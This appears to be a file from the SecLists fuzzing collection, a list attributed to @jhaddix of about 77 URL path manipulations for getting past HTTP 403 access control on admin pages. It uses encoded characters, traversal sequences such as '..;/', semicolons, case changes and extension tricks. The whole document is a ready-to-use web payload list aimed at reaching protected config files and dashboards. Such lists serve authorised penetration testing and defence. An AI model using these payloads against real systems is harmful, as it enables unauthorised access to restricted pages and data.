SecLists/Fuzzing/403/403.md

403 Bypass list by @jhaddix

Url Manipulation Methods

Below are the top 77 ways to bypass access control on incorrectely protected pages. These work best on config files and global dashboards.

url.com/admin/?
url.com//admin//
url.com///admin///
url.com/./admin/./
url.com/admin?
url.com/admin??
url.com/admin??
url.com/admin/?/
url.com/admin/??
url.com/admin/??/
url.com/admin/..
url.com/admin/../
url.com/admin/./
url.com/admin/.
url.com/admin/.//
url.com/admin/*
url.com/admin//*
url.com/admin/%2f
url.com/admin/%2f/
url.com/admin/%20
url.com/admin/%20/
url.com/admin/%09
url.com/admin/%09/
url.com/admin/%0a
url.com/admin/%0a/
url.com/admin/%0d
url.com/admin/%0d/
url.com/admin/%25
url.com/admin/%25/
url.com/admin/%23
url.com/admin/%23/
url.com/admin/%26
url.com/admin/%3f
url.com/admin/%3f/
url.com/admin/%26/
url.com/admin/#
url.com/admin/#/
url.com/admin/#/./
url.com/./admin
url.com/./admin/
url.com/..;/admin
url.com/..;/admin/
url.com/.;/admin
url.com/.;/admin/
url.com/;/admin
url.com/;/admin/
url.com//;//admin
url.com//;//admin/
url.com/admin/./
url.com/%2e/admin
url.com/%2e/admin/
url.com/%20/admin/%20
url.com/%20/admin/%20/
url.com/admin/..;/
url.com/admin.json
url.com/admin/.json
url.com/admin..;/
url.com/admin;/
url.com/admin%00
url.com/admin.css
url.com/admin.html
url.com/admin?id=1
url.com/admin~
url.com/admin/~
url.com/admin/°/
url.com/admin/&
url.com/admin/-
url.com/admin\/\/
url.com/admin/..%3B/
url.com/admin/;%2f..%2f..%2f
url.com/ADMIN
url.com/ADMIN/
url.com/admin/..\;/
url.com/*/admin
url.com/*/admin/
url.com/ADM+IN
url.com/ADM+IN/